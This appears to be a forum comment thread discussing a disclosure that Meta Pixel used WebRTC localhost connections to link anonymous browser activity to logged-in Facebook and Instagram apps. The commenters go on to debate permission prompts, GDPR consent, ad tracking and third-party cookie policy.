1. User logged into FB or IG app. The app runs in background, and listens for incoming traffic on specific ports.
2. User visits website on the phone's browser, say something-embarassing.com, which happens to have a Meta Pixel embedded. From the article, Meta Pixel is embedded on over 5.8 million websites. Even in In-Cognito mode, they will still get tracked.
3. Website might ask for user's consent depending on location. The article doesn't elaborate, presumably this is the cookie banner that many people automatically accept to get on with their browsing?
4. > The Meta Pixel script sends the _fbp cookie (containing browsing info) to the native Instagram or Facebook app via WebRTC (STUN) SDP Munging.
You won't see this in your browser's dev tools.
5. Through the logged-in app, Meta can now associate the "anonymous" browser activity with the logged-in user. The app relays _fbp info and user id info to Meta's servers.
Also noteworthy:
> This web-to-app ID sharing method bypasses typical privacy protections such as clearing cookies, Incognito Mode and Android's permission controls. Worse, it opens the door for potentially malicious apps eavesdropping on users’ web activity.
> On or around May 17th, Meta Pixel added a new method to their script that sends the _fbp cookie using WebRTC TURN instead of STUN. The new TURN method avoids SDP Munging, which Chrome developers publicly announced to disable following our disclosure. As of June 2, 2025, we have not observed the Facebook or Instagram applications actively listening on these new ports.
Thank you! This was a powerful reminder of how important it is to be careful with our words and cover all possibilities when commenting, and additionally, holding ourselves to account for our reading. I was a bit stunned at how I just sort of...flitted through? browsed? skimmed?...well, let's put it plainly: irresponsibly claimed to myself to have read and understood this. Meanwhile, I had completely neglected to notice this goes far beyond embarrassment. It's quite damning that I entirely missed that the consequences of someone knowing someones entire browsing history aren't just mere "embarrassment": first, there are plenty of contexts where it could even lead to state activity and my eventual imprisonment. We can even show that some countries punish the family still in a given country for the perceived "sins" (shorthand, i mean violating laws / actions against power, apologies for sloppiness here) of an individual outside the country. I shold have at least thought to acknowledge that it could go beyond embarrassment - your framing may even be too polite, to readers like me, who neglected to consider this.
So main application for WebRTC is de-anonymisation of users (for example getting their local IP address). Why it is not hidden behind permission I don't understand.
The main application for WebRTC is peer to peer data transfer.
I think you can make the argument that it should be behind a permission prompt these days but it's difficult. What would the permission prompt actually say, in easy to understand layman's terms? "This web site would like to transfer data from your computer to another computer in a way that could potentially identify you"? How many users are going to be able to make an informed choice after reading that?
If users don't understand, they click whatever. If the website really needs it to operate, it will explain why before requesting, just like apps do now.
Always aim for a little more knowledgeable users than you think they are.
And specifically, if you're on something-sensitive.com in a private browsing session, it would give you the choice of giving no optional permissions. That choice is better than no choice at all, especially in a world where Meta can be subpoenaed for this tracking data by actors who may be acting unconstitutionally without sufficient oversight.
That feels pretty useless. You might as well do what happens today: enable it by default and allow knowledgable power users to disable it. If it's disabled, show a message to the user explaining why it's needed.
it does exist in `about:config`, which could be made as a UI setting instead:
`media.peerconnectin.enabled`.
on cromite[1], a hardened chromium fork, there is such a setting, both in the settings page, as well as when you click on the lock icon in the address bar.
I think very few people would argue that cookie consent banners in the form in which they are the norm are a good thing just like permission prompts for microphone access are.
Browser functionality needs a hard segmentation into disparate categories like "pages" and "apps". For example, Pages that you're merely intending to view don't need WebRTC (or really any sort of network access beyond the originating site, and even this is questionable). And you'd only give something App functionality if it was from a trustable source and the intent was to use it as general software. This would go a long way to solving the other fingerprinting security vulnerabilities, because Pages don't need to be using functionality like Canvas, USB, etc.
It's only "profitable" if people don't bounce at being asked to trust a random news article, or something-embarassing.com, with their personal information. Same as why native Android apps don't just ask for every single permission. People in general do care about their security, they just lack tools to effectively protect it.
When enrolling Yubikeys and similar devices, Firefox sometimes warns "This website requires extra information about your security device which might affect your privacy. Do you want to give this information? Refusing might cause the process to fail."
I wouldn't understand that. Is it getting a manufacturer address to block some devices? Does it use a key to encrypt something? Which "security device? /dev/urandom?
I see that non-technical users can be confused by too much information, but when you omit this even knowledgeable users can't make an informed decision.
1- You'd be in a page where you'll be enrolling your YubiKey or WebAuthn device. You'll be having your key at hand, or recently plugged in.
2- Your device's LED would be flashing, and you'll be pressing to the button on your device.
3- The warning will pop-up at that moment, asking that question to you. This means the website probably querying for something like the serial number of your key, which increases the security, but reduces your privacy.
With the context at hand, you'd understand that instantly, because the place you are and the thing you're doing perfectly completes the picture, and you're in control of every step during the procedure.
Exactly. You need to infer that, it isn't stated directly.
Same like you need to guess, that "Unable to connect" means connection refused, while "We can’t connect to the server at a" means the DNS request failed. Or does it mean no route to host? Network is unreachable?
I would argue, that (sometimes) the user would be fine to distinguish whether he wants to approve something, but can't because both dialogs state the same wishy-washy message. Even non-technical users (might) eventually learn the proper terms, but they can't if they only get shown meaningless statements.
> Exactly. You need to infer that, it isn't stated directly.
I don't care. The site is doing something unusual. It's evident, it's enough to take a second look and think about it.
> Same like you need to guess, that "Unable to connect" means...
Again, as a layman, I don't care. As a sysadmin, I don't worry, because I can look into in three seconds flat. Also, Unable to Connect comes with its reasons in parantheses all the time.
> I don't care. The site is doing something unusual. It's evident, it's enough to take a second look and think about it.
Is it enough to do an informed decision?
> Again, as a layman, I don't care.
You do care, whether you mistyped or the network is down. I agree that you probably don't care to distinguish between "network unreachable" and "no route to host" though.
> As a sysadmin
True, but that information was already there and was thrown away.
Let's be clear here. Meta/other sites are abusing the technology TURN/WebRTC for a purpose it was never intended for, way beyond the comfortable confines of innocent hackery, and we all know it.
That's asshole behavior, and worth naming, shaming, and ostracizing over.
> That's asshole behavior, and worth naming, shaming, and ostracizing over.
These exploits are being developed, distributed and orchestrated by Meta. The ”millions of websites” are just hummus recipe content farms using their ad SDKs, and are downstream Zuck in every meaningful interpretation of the term.
Meta has been named and shamed for decades. Shame only works in a society where bad actors are punished by the masses of people that constitute Meta’s products. Doesn’t mean we should stop, only that it’s not enough.
More than that, talking about TURN or WebRTC is really missing the issue. If you lock everything down so that no one can do anything you wouldn't want a malicious actor to be able to do, then no one can do anything.
The real issue is, why are we putting up with having these apps on our devices? Why do we have laws that prohibit you from e.g. using a third party app from a trusted party or with published source code in order to access the Facebook service, instead of the untrustworthy official app which is evidently actual malware?
What laws are you referring to other than Terms of Service which are entirely artificial constructs whisked into existence by service/platform providers? Which will, admittedly, be as draconian and onesided as the courts will allow.
Agree on your first point at a practical level, but from the normative standpoint, it's unforgivable to cross those streams. At the point we're talking about with a service provider desperately wanting to leak IP info for marketability applications of an underlying dataset and using completely unrelated to the task at hand technical primitives to do it, you very clearly have the device doing something the end user doesn't want or intend. The problem is that FAANG have turned the concept of general computing on it's head by making every bloody handset a playground for the programmer with no easily grokkable interface to the user to curtail the worst behavior of technically savvy bad actors. A connection to a TURN server or use of parts of the RTC stack should explain to the user they are about to engage programming intended for real-time communication when it's happening not just once at the beginning when most users would just accept it and ignore it from then on.
10 or so TURN call making notifications in a context where synchronous RTC isn't involved should make it obvious that something nefarious is going on, and would actually give the user insight into what is running on the phone. Something modern devs seem to be allergic to, because it would cause them to have to confront the sketchiness of what they are implementing instead of being transparent with the principle of least surprise.
Modern businesses though would crumble under such a model because they want to hide as much about what they are doing as possible from the customer base/competitors/regulators.
>
> What laws are you referring to other than Terms of Service which are entirely artificial constructs whisked into existence by service/platform providers? Which will, admittedly, be as draconian and onesided as the courts will allow.
There are two main ones.
The first is the CFAA, which by its terms would turn those ToS violations into a serious felony, if violations of the ToS means your access is "unauthorized". Courts have been variously skeptical of that interpretation because of its obvious absurdity, but when it's megacorp vs. small business or open source project, you're often not even getting into court because the party trying to interoperate immediately folds. Especially when the penalties are that scary. It's also a worthless piece of legislation because the actual bad things people do after actual unauthorized access are all separately illegal, so the penalty for unauthorized access by itself should be no more than a minor misdemeanor, and then it makes no sense as a federal law because that sort of thing isn't worth a federal prosecutor's time. Which implies we should just get rid of it.
The other one, and this one gets you twice, is DMCA 1201. It's nominally about circumventing DRM but its actual purpose is that Hollywood wants to monopolize the playback devices, which is exactly the thing we're talking about. Someone wants to make an app where you can watch videos on any streaming service you subscribe to and make recommendations (but the recommendations might be to content on YouTube or another non-Hollywood service), or block ads etc. The content providers use the law to prevent this by sticking some DRM on the stream to make it illegal for a third party app to decrypt it. Facebook can do the same thing by claiming that other users' posts are "copyrighted works".
And then the same law is used by the phone platforms to lock users out of competing platforms and app stores. You want to make your competing phone platform and have it run existing Android apps, or use microG instead of Google Play, but now Netflix is broken and so is your bank app so normal people won't put up with that and the competition is thwarted. Then Facebook goes to the now-monopoly Google Play Store and has "unauthorized" third party Facebook readers removed.
These things should be illegal the other way around. Adversarial interoperability should be a right and thwarting it should be a crime, i.e. an antitrust violation.
> The problem is that FAANG have turned the concept of general computing on it's head by making every bloody handset a playground for the programmer with no easily grokkable interface to the user to curtail the worst behavior of technically savvy bad actors.
But how do you suppose that happened? Why isn't there a popular Android fork which runs all the same apps but provides a better permissions model or greater visibility into what apps are doing?
>Why isn't there a popular Android fork which runs all the same apps but provides a better permissions model or greater visibility into what apps are doing?
Besides every possible attempt being DoA because Google is intent on monopolizing the space with their TOS and OEM terms? There isn't a fork because it can't be Android if you do that sort of thing, and if you tried to it'd be you vs. Google. Nevermind the bloody rats nest of intentional one-sided architecture decisions done to ensure the modern smartphone is first and foremost a consumption device instead of a usable and configurable tool, which includes things like regulations around the base and processor, lawful interception/MITM capability, and meddling, as you mentioned, in the name of DMCA 1201.
Though there's an even more subtle reason why, too, and it's the lack of accessible system developer documentation, capability to write custom firmware, and architecture documentation. It's all NDA locked IP, and completely blobbed.
The will is there amongst people to support things, but the legal power edifice has constructed intentional info asymmetries in order to keep the majority of the population under some semblance of controlled behavior through the shaping of the legal landscape and incentive structures.
> The will is there amongst people to support things, but the legal power edifice has constructed intentional info asymmetries in order to keep the majority of the population under some semblance of controlled behavior through the shaping of the legal landscape and incentive structures.
Exactly. We have bad laws and therefore bad outcomes. To get better outcomes we need better laws.
There are already permissions dialogs for using the camera/microphone. I don't think it'd be absurd to implicitly grant WebRTC permissions alongside that.
>The website wants to connect to another computer|another app on your computer.
"website wants to connect to another computer" basically describes all websites. Do you really expect the average user to understand the difference? The exploit is also non-trivial either. SDP and TURN aren't privacy risks in and of themselves. They only pose risks when the server is set to localhost and with a cooperating app.
Pardon my ignorance, but modern browsers won't even load assets or iframes over plain http within an SSL page. So under normal circumstances you cannot open so much as an iframe to "localhost" from an https url unless you've configured https locally. Regardless of crossdomain perms. Wouldn't you want to require a special security permission from an app that was trying to setup a local server, AND require confirmation from a browser that was trying to connect to a local server?
HTTP isn't allowed on secure pages because the security of HTTP is known to be non-existent. WebRTC uses datagram TLS, which is approximately on par with HTTPS.
The thing that's happening here isn't really a problem with WebRTC. Compare this to having an app on your phone that listens on an arbitrary port and spits out a unique tracking ID to anything that connects. Does it matter if the connection is made using HTTP or HTTPS or WebRTC or something else? Not really. The actual problem is that you installed malware on your phone.
But that says nothing about the danger of identifying you.
> Most users probably will click "No"
Strong disagree. When I'm loading google.com is my computer not connecting to another computer? From a layman's perspective this is the basis of the internet doing what it does. Not to mention, the vast majority of users say yes to pretty much any permission prompt you put in front of them.
The existing killer app for WebRTC is video chat without installing an app, which is huge.
Other P2P uses are very cool and interesting as well - abusing it for fingerprinting is just that, abusing a user-positive feature and twisting it for identification, just like a million other browser features.
The technique doesn't actually rely on webrtc though, does it? Not showing up in the default view of chrome's network inspector obfuscates it a bit, but it's not like there aren't other ways to do what they're achieving here.
Because the decision makers don't care about privacy, they only want you to think that you have privacy, thus enabling even more spying.
One solution is to not use the apps and websites from companies that are known to abuse WebRTC or something else.
This is not unique to WebRTC. The same result could be achieved by sending a http request to localhost. The only difference in this case is that using WebRTC doesn't log a http request
Not totally following but it sounds like you are saying one of the things they have been doing involves abusing mandated GDPR cookie notices to secretly track people?
Yes? The cookie in question is First Party, which means you’ve consented to permitting only that party to track you using it, and not permitting its use for wider behavioral tracking across websites.
However, the locally hosted FB/Yandex listener receives all of these first party cookies, from all parties, and the OPs implication is (I think) that now these non-correlateable-by-consent first party cookies can be or are being used to track you across all sites that use them.
Not only did you only consent to the one party using it, but the browser has robust protections in place to ensure that these cookies are only usable by that party. This “hack” gets around the restriction completely, leveraging a local service to aggregate all the cookies across sites.
This is why things involving cookies for permission to do things were really poison pills. As long as there is a cookie to be tracked, any at all, you have the data exfil/tracking problem. Only thing that changes is where the aggregation happens.
IANAL, but it's not GDPR-conformant consent in any way. Consent needs to be informed, unambiguous, and freely given to be valid and should be easy to reject. The only way for this to be valid would be a consent form with something like:
Allow Meta tracking to connect the Facebook or Instagram app on your device to associate visits to this website with your Meta account. Yes/No (With No selected as a default.)
I am pretty sure that this is a grave violation of the GDPR.
That's probably already part of the consent form websites pop up listing 200 different trackers. If you permit data sharing with Facebook/IG/Meta in the consent form, you're consenting to tracking in general, not just cookie-based tracking.
"No" doesn't even need to be selected as a default, as long as you don't use dark patterns. Making the user manually click yes or no is perfectly valid (as long as you don't make "yes" easier than "no", so if you add an "allow all" button there should be an equally prominent "deny all" button).
The intent of these laws is just so obtuse and unclear! And beyond that complying is technically impossible to implement but you could only understand that if you were a rocket scientist PhD computer science wizkid making $$$$k in California which isn't that much in such a high cost of living area donchaknow. /sardonic
The cookie preference pop-up is a cookie. To track your preference, they need a cookie. We legally mandated a cookie. They're using the cookie regardless. But no one will call them on it until a critical mass is reached to get cases in a sufficiently large number of jurisdictions to curtail the behavior.
A reminder that it's possible to use tools like XPL-EX to circumvent those attempts. Also ad blocking via adaway would do the trick here I assume, as it should block Meta Pixel tracking. Overall, awful approach.
I wish we could just ban advertising and tracking on the internet. I feel like so much crap these days has come out of it, all so that CEOs can afford an extra yacht
It's already enough to just have plain ads. Like we have them on the streets, at the bus station, newspapers, etc. No tracking needed at all, just give out the message. If you need to target people to it in the context of the place or content you are showing it with. But you don't need to know anything about the user seeing the ad. Targeting by user doesn't work anyway.
Like on the frontend side with Facebook which thinks if I'm interested into cycling I will also be interested in cars (both are on the street, right?) or if I'm interested in some more dirty humor I also want to see more "naughty" stuff.
And also on the backend used by magazines and they mostly don't use the user profiles because it's too targeted and doesn't have enough audience. And if you make the targeting broad enough you'll have again people interested in chocolate so you target them with wine and whiskey.
Or even better on Amazon where you can buy a new TV and when you have done so it will suggest you even more TVs for the next months.
Depending on the data you collect, targeting by user - unfortunately - works. If the granularity is not one user, it will be a hundred. If not, a thousand, and so on. I've seen apps run ads targeting a total of 5 cohorts(together holding a hundred million users), and I've seen companies run ads targeting 100s of cohorts with the same number of users. They all work better than no targeting at all.
However what you're saying isn't completely wrong. I've also seen user targeting become a self-fulfilling prophecy. What happens is that it's championed by a high level executive as the panacea for improving revenue, implemented, and seen to not work. Now, as we all now, the C*O is Always Correct, so everything else around it is modified until the user-level targeting A/B test shows positive results. Usually this ends up in the product being tortured into an unusable mess.
Before you target 5 different cohorts it's better to target the context of where the ad is shown. i.e. web content normally already has a category and people reading an article about cheap flats in a city might be very much interested in renting or buying a flat. By collecting signals on a user you might only get that interested after a longer time, if you even have a profile, and by the time you pick it up they might have a new flat and are no longer interested.
Yes definitely. User level targeting comes after targeting particular ad spaces in some ad platforms. But it still adds enough marginally to be useful.
I don't think it has to go that far. I think there's a middle ground here that people would accept: show us ads, but make it a one-way firehose, like TV and billboards. If you need to advertise to pay for the site, put up all the banners you want. But don't try to single me out for a specific one.
If it could pay for network TV there's no reason it can't pay for a website.
(You could still do audience-level tracking, e.g. "Facbebook and NCIS are both for old people, so advertise cruises and geriatric health services on those properties")
Reddit has fairly extensive device fingerprinting. And they are selling data for training AI models. It's only a matter of time before there is some premium phone app that monetizes data that otherwise isn't available/for sale.
This type of thing is pure greed, completely distinct from a highly aggressive pursuit of far more lucrative opportunities that average businessmen have been able to accomplish in the extreme interest of their shareholders.
Those true leaders are the traditional examples who have shown success over the centuries, without letting any greed whatsoever become a dominant force, recognizing and moving in the opposite direction from those driven by overblown self-interest, who naturally have little else to offer. It can be really disgraceful these days but people don't seem to care any more.
That's one thing that made them average businessmen though.
Now if you're below-average I understand, but most companies' shareholders would be better off with a non-greedy CEO, who outperforms by steering away from underhanded low-class behavior instead.
Now if greed is the only thing on the table, and somebody like a CEO or decision-making executive hammers away using his only little tool with admirable perseverance long enough, it does seem to have a likelihood of bringing in money that would not have otherwise come in.
This can be leveraged too, by sometimes even greedier forces.
All you can do is laugh, those shareholders might be satisfied, but just imagine what an average person could do with that kind of resources. It would put the greedy cretins to shame on their own terms.
And if you could find an honest above-average CEO, woo hoo !
The majority of internet users are either unwilling or unable to pay for content, and so far advertising has been the best business model to allow these users to access content without paying. Do you have a better suggestion?
They are able, because in the end advertising is also paid by customers. The complications are:
- Paying for services is very visible, whereas the payment for advertising is so indirect that you do not feel like you are paying for it.
- The payments for advertising are not uniformly distributed, people with more disposable income most likely pay more of overall advertising. But subscriptions cannot make distinctions between income.
- People with disposable income are typically the most willing to pay for services. However, they are also the most interesting to advertisers. For this reason, payment in place of ads is often not an option at all, because it is not attractive to websites/services.
I think banning advertising would be good. But I think a first step towards that would be completely banning tracking. That would make advertisements less effective (and consequently less valuable) and would pose services to look for other streams of income. Plus it would solve the privacy issue of advertising.
It's a game. When a merchant signs up to an ad platform (or when the platform is in need of volume), they are given good ROI, and the merchant also plays along and treats it as "marketing expenditure". Eventually, the ROI dries up i.e the marketing has saturated and the merchant starts counting it as a cost and passes it onto the customer. I don't know if this is actually done, but it's also trivial for an ad platform to force merchants to continue ads by making them feel it's important: when they reduce their ad volume, just boost the ROI and visibility for their competitors (a competitor can be detected purely by shared ad space no need to do any separate tagging). Heck, this is probably what whatever optimization algorithm they are running will end up suggesting as it's a local minima in feature space.
And yes, instead of banning ads, which would be too wide a legal net to be feasible, banning tracking is better. However, even this is complicated. For example, N websites can have legitimate uses for N browser features. But it turns out any M of the N features can be used to uniquely identify you. Oops. What can you even do about that, legally speaking? Don't say permissions most people I know just click allow on all of them.
I think that might be a rhetorical device bequeathed to you by the social media companies.
People of course do pay for things all the time. It’s just the social media folks found a way to make a lot more money than people would otherwise pay, through advertising. And in this situation, through illegal advertising.
The best thing we can all do is refuse to work for Meta. If good engineers did that, there would be no Meta. Problem solved. But it seems many engineers prefer it this way.
Sure, this entire business model has been cataclysmic for traditional media organizations and news outlets and peoples trust in institutions has plummeted in correlation, so, let’s just fucking scrap it and go back to payed media.
Manufacturing consent identified advertisement as one of its five filters and was published in 1988. It is and was extremely rare for a magazine or news paper to not be at least partially funded by advertisements.
>The majority of internet users are either unwilling or unable to pay for content
Except for Spotify, News subscriptions, videogame subscriptions, video streaming services, duolingo, donations, gofundmes, piracy services!, clothing and food subscriptions! etc etc
People pay $10 for a new fortnite skin. You really pretending they won't pay for content?
People were willing to pay for stuff on the internet even when you could only do so by calling someone up and reading off your credit card number and just trusting a stranger.
Meanwhile, the norm until cable television for "free" things like news was that you either paid, or you went to the library to read it for free.
By defining the $thing, banning the $thing per definition by law, and then tasking FBI-like organization enforce the law? It won't completely go away but it will subside, like how gambling on Internet is divided binary and confined into lootbox games without cashing features and straight up scam underground casinos.
Personally I think we should start from separating good old ads(that existed before I was 15) and Internet "ads". The old ads were still somewhat heavily targeted, but less than it is now. There probably would be an agreeable line up to which level advertisement efforts can be perverted.
I mean the comparison of ‘old’ ads vs new ads is interesting in itself, old ads already abide by far more regulation and are far more auditable. Simply bringing digital ads in line would be a big step forward.
Some examples:
In most countries it’s illegal to ‘target minors’ and there’s restrictions on what ads can run on after school hours. Meta has always allowed age targeting down to 13 and has no time of day restrictions.
In parts of New Zealand you can’t advertise alcohol between 10PM and 9AM… unless you do it on Meta or Google.
Most countries have regulation about promoting casinos (or the inability to) unless they’re digital casinos being promoted in digital ads.
Or just look at the deepfake finance and crypto ads that run on Meta and X. Meta requires 24 strikes against an advertiser before they pull them down, if a TV network ran just one ad like that it would be a scandal.
Audit-ability is the biggest issue imo. If a TV ad runs we can all see it at the same time and know it ran. That is simply impossible with digital ads, and even when Meta releases some tools for auditing the caveat is that you still have to trust what they’re releasing. Similarly with data protection there’s no way to truly audit what they’re doing unless you install government agencies in the companies to provide oversight, and I don’t see how you could really make that work.
It would be nice if they also couldn't target us with more information than what we consent to give them. Like, fine, if you want to target facebook ads at people using details they've filled in, I can see that being acceptable, but trying to scrape every single byte of data about us and using that to throw targeted ads at us feels icky.
Better moderation of crappy AI-generated image ads that are just scamming you would be nice as well.
All we need to do is define the $thing and mandate that lawsuits can be effective.
No agency enforces that potato chips need to fill up 92% of the bag or whatever, or that McDonalds cannot show pictures of apple fritters with more apples than they actually come with (this happened).
You just incentivize a cottage industry of legal that can squeeze a profit out of suing peanut butter companies for labelling incorrectly, or advertising dishonestly and it sort of takes care of itself.
I think the main problem is lots of money are made from it, and money influences politics hugely. The technical difficulties are low on the list of reasons this is not happening.
I like the idea, but where do you draw the line on what advertising is.
Is affiliate marketing still allowed? Are influencers allowed to take payment? Can people be a spokesperson for a company? Can newspapers run commentary about businesses? Can companies pay to be vendors at a conference?
No matter where you end up drawing the line you’re just shifting the problems somewhere else. Look at the amount of money Meta and Google make, the incentive is just too large.
A lot of things I would have previously said were impossible have happened in the last half year. If only a few of those things were of the impossibly good type.
...and so consumers can use services/products without having to fork over money.
People love the ad-model. Given the option to pay or use the "ad-supported" option, the ad-supported one wins 10 to 1. This means in many cases it doesn't even make sense to have a paid option, because the ad option is just so much more popular.
As bad as crypto is, with all the negative things attached to it, BAT was probably one of the smartest things to be invented. A browser token that automatically dispenses micropayments to websites you visit. Forget all the details to get snagged on, the basic premise is solid: Pay for what you use. You become the customer, not the advertisers.
Also a note about ad-blocking - it only makes the problem worse. It is not a "stick it to the man" protest. You protest things by boycotting them, or paying their competitors, not by using them without compensating them.
There is no such thing as a free lunch. Consumers on average are forking over the money. Otherwise no one would pay for advertising. And they are paying more than they would have otherwise since this dystopian tracking apparatus isn't free either.
Yes, we need ads for a free internet, today. And, as a result, we also have our privacy eroded - eroded in ways we may not care about today, but will probably regret tomorrow.
If we must pay for the internet, give me an option to pay to use it where I see no ads and my privacy is preserved. Let me know what that cost is and I'll decide what I want to do.
Right now, the actual pricing is obscured so we just "accept" that the internet in its current form is how it needs to be.
I really liked the concept of BAT but the reality left me wanting.
Things like "we'll hang on to the tokens of sites that don't use BAT yet for them until they join" gave negative vibes.
It all felt a little underbaked. I swing back to Brave once in a blue moon and then remember I've got at least $20's worth of BAT lost forever somewhere.
I'm not a big fan of it or anything, it's just the only crypto I know that was targeting that idea.
I'd love if there was another one that was totally open and just a browser extension away. But I do not think it would ever get off the ground because...
People love the ad model and hate paying for things.
The deprecation of third-party cookies, that all browsers were at one point on track to implement, was pretty much the most realistic first step to that. Which is why Google killed it last year by leveraging their control over Chrome.
While not technically a crime, it was a disgusting, unethical market manipulation move that never really got the public outrage it deserved.
Google execs’ initial support for it was also telling: leadership at Google must literally thought they would find another way to stay as profitable as they are without third-party cookies. Put another way: Google leadership didn’t understand cookies as well as someone who’s taken a single undergrad web dev class. (Or they were lying all along, and always planned to “renege” on third-party cookie deprecation.)
I don't think that's quite what happened. Google got in anti-trust trouble because they have an unfair advantage in user-tracking, given logged in Chrome accounts. Removing third-party cookies hurts other privacy-invading companies without substantially affecting Google. It was still somewhat on track to be removed from Chrome until they lost their antitrust battle, and Chrome was required to be spun off. With Chrome's new future, and Google's new legal constraints, there's less incentive to try and make Privacy Sandbox work. At least, that was my understanding; I didn't follow it all that closely.
This is very misleading. Google was prevented from disabling third-party cookies due to intervention by the CMA, who felt it would provide an unfair advantage over other advertisers. Google argued their case for years, proposed competing standards to act as a replacement (see Topics API), and eventually gave up on the endeavour altogether and simply made it a user toggle.
Google gets no competitive advantage from removing third party cookies from chrome. The anticompetitive monopolistic tactic was the plan to replace third party cookies with FLoC/Privacy Sandbox/Topics AI, and THAT is what they were not prevented from doing.
No one is trying to stop google from removing third party cookies. Google is just unwilling to remove them without introducing a new anticompetitive tracking tool to replace them.
> No one is trying to stop google from removing third party cookies.
That's simply not true. As I already mentioned, the CMA presented a legal challenge which you can read about online. Please review the history, as it's been going on for years now.
The first link confirms exactly what I said above. They’re not preventing Google from removing third party cookies, they’re preventing Google from implementing ALTERNATIVES to third party cookies. The only reason Google is unwilling to straight up remove third party cookies is their business model.
The CMA was concerned that, without regulatory oversight and scrutiny, Google’s alternatives could be developed and implemented in ways that impede competition in digital advertising markets. This would cause advertising spending to become even more concentrated on Google, harming consumers who ultimately pay for the cost of advertising. It would also undermine the ability of online publishers such as newspapers to generate revenue and continue to produce valuable content in the future.
The second link does contain the phrase “cannot proceed with third-party cookie deprecation”, but it’s simply obvious that it’s not about third party cookies per se. It’s all about Google’s (unnecessary, anticompetitive, anti-user, anti-privacy) replacements for third party cookies.
… report on the implementation of Google’s Privacy Sandbox commitments, the regulator has said that although the tech giant is so far complying with its demands, there remain considerable areas of concerns …
…
That it must not “design, develop or use the Privacy Sandbox proposals in ways that reinforce the existing market position of its advertising products and services, including Google Ad Manager“
…
It must also address issues with specific Sandbox tools such as how its Topics API targeting alternative can harm smaller tech business, and clarify who will govern the Topics API taxonomy.
It is true that the CMA is concerned with the new API proposals within the Privacy Sandbox such as Topics. However, this is from an anti-competitive angle, rather than privacy. Their goal is to ensure market fairness.
As part of that same process, they have put considerable friction in place for removing third-party cookies. They've deemed that the removal of third-party cookies could give Google an unfair market advantage, and that is why they're concerned with finding an alternative solution to replace them. This has been a very slow process, and involves many discussions and debates with regulators. That has had significant influence on the design of the Topics API.
To provide a more direct example, the CMA have also put specific stalls into the deprecation process, such as the standstill period invoked last year:
> The CMA will start a formal review of Google’s plan to deprecate cookies and Chrome’s Privacy Sandbox replacements once Google triggers a 60-day standstill period, likely at the beginning of the third quarter. During this standstill, the tech giant is forbidden to put in motion any deprecation procedures on Chrome. ... If they can’t reach an agreement, the 60-day standstill period will become 120 days.
To put it simply, third-party cookies would have been dead and buried long ago if this dispute were not happening. It may be possible for Google to remove third-party cookies without a replacement, but they'd have be risking a significant lawsuit and contravention of UK authority by doing so.
That stemmed from “dammit Google now every SaaS developer has to work nights to meet your arbitrary deadline”; here we’re caring more about the impact as consumers. It’s ok to think about things in two ways.
source: a developer who actually did have to do this (and did it, and now didn’t have to, but it’s done)
That's a bit ironic, considering how they're using any side channel they could lay their hands on (e.g. Wi-Fi AP names) to track everyone. Basically every large app vendor with multiple apps does something similar to circumvent OS restrictions as well.
The EU should set some record breaking fines for this.
Maybe it's time to invent a tax that starts at 0% and goes up 1-X% every time your hand is cought in the cookie jar. And add a corresponding website where you can clearly see all violations by company.
I agree they should. But I don't think the EU has any real ability to send American tech execs to jail. At most they can stop them doing business in the EU.
I am not sure which Meta apps open ports, but e.g. Samsung phones come with a bunch of Meta apps pre-shipped. IIRC just removing the Facebook app is is not enough, there is another service installed that is not visible as an app (com.facebook.services etc.), which you can only uninstall from the data partition with something like ADB/UAD.
I remember a few years ago analyzing a modern Samsung phone's web traffic. It had by far the most ad-related and monetizing connections out of any other phone I've ever seen. And they were part of "necessary" functions, so you couldn't just block that traffic.
Samsung has great tech, but I avoid because it's so bloated and abusive.
I think Samsung stopped preinstalling Facebook's weird services a while back. Xiaomi still seems to be shipping Facebook last time I checked, though.
Even outside of Samsung a lot of "normal" apps come packed with Facebook crap because of Facebook's SDK (for the "log in with Facebook" button). There was that one incident where many/most iOS apps didn't open anymore because Meta fucked something up on their servers that crashed every app with the Facebook SDK inside of it (https://www.wired.com/story/facebook-sdk-ios-apps-spotify-ti...).
I tend to buy stock Android, e.g. Motorola moto g30, etc. It still has lots of Google stuff, but you can get rid of them, and I have a work profile specifically designed for Google-related stuff, and my personal profile is de-Googled as much as possible.
I would recommend everyone who wants a clean Android to look into Google Pixel phones. Aside from being mostly bloat-free (and most bloat can be uninstalled), it is one of the few phones that supports unlocking/relocking and a secure open source alternative (GrapheneOS).
Does grapheneos prevent this? In what way? I know apps like ShareViaHTTP [1] are able to open ports (listening not just on the loopback address). If I installed a meta app, could it still run its listener that scripts on webpages could talk to?
I didn't say that. Only that GrapheneOS does not come with any adware/malware preinstalled. That said, their default browser did block one of the attack vectors:
Samsung devices are loaded with malware and AI slop in general. I'd avoid them if you at all care about privacy. Since Google is still missing end to end encryption for cloud data, iOS seems like the only good choice currently.
iOS sends data to metrics.apple.com, metrics.icloud.com, iadsdk.apple.com, etc. a lot. They are much better than Samsung (who send data to Samsung and other parties), but I am not convinced they are much better than Google devices. It's more who you prefer sending your data to.
In the end something like GrapheneOS is the only good choice. Has all the security features of Pixel (which is similar to iPhone) and the tracking of neither.
Not all metrics are equal. I don't really care if Apple collects anonomized data on which features are most used or collects crash reports. That's worlds away from using preinstalled apps to backdoor your phone to provide tracking scripts your details in incognito mode.
> Not only our their websites painful which discourages use, websites are more sandboxed.
This isn't remotely true. It is pretty trivial for a well-resourced engineering organization to generate unique fingerprints of users with common browser features.
Would an individual using this technique to collect information from someone else's computer possibly face prosecution under the Computer Fraud and Abuse act?
People have been prosecuted under that act for clicking "view source" on their web browser. The crime itself is irrelevant. It's more about who you are/what connections you have/who you piss off.
That was a real news story. A journalist looked at the state's educator-credentials checker, viewed the source and saw it had teacher's SSNs in base64 somewhere in the plaintext. Missouri Governor Mike Parson then tried to legally threaten the journalist. Honestly, if this case wasn't as high-profile, I think he might have got a conviction, at least in state court.
This only works if you control the code on both sides (ie. on the website being visited and an app running on the phone). It's not some sort of magic hack that allows you to exfiltrate arbitrary browser history. Therefore it's unclear how it can be construed as "hacking" in any meaningful way. As bad non-consensual tracking done by google/meta/whatever are, it's not covered under CFAA.
I agree it's not hacking, but the Computer Fraud and Abuse act seems to have a pretty broad definition of computer fraud and abuse. In particular, the technique seems like it might (emphasis mine) "knowingly and with intent to defraud, accesses a protected computer without authorization, or exceeds authorized access, and by means of such conduct furthers the intended fraud and obtains anything of value …". Would the other person have a reasonable belief that they didn't authorize access to information which their OS attempts to prevent access to?
I don't know, you're purposefully abusing oversights to completely bypass the sandbox. It's an exploit for sure in my mind, and it seems very intentionally done. Like, it was done this way specifically because it allows them to circumvent other protections they know existed.
The yandex one uses client/browser-side code to exfiltrate; it’s within the realm of possibility to abuse this, given a user visits a site under your control.
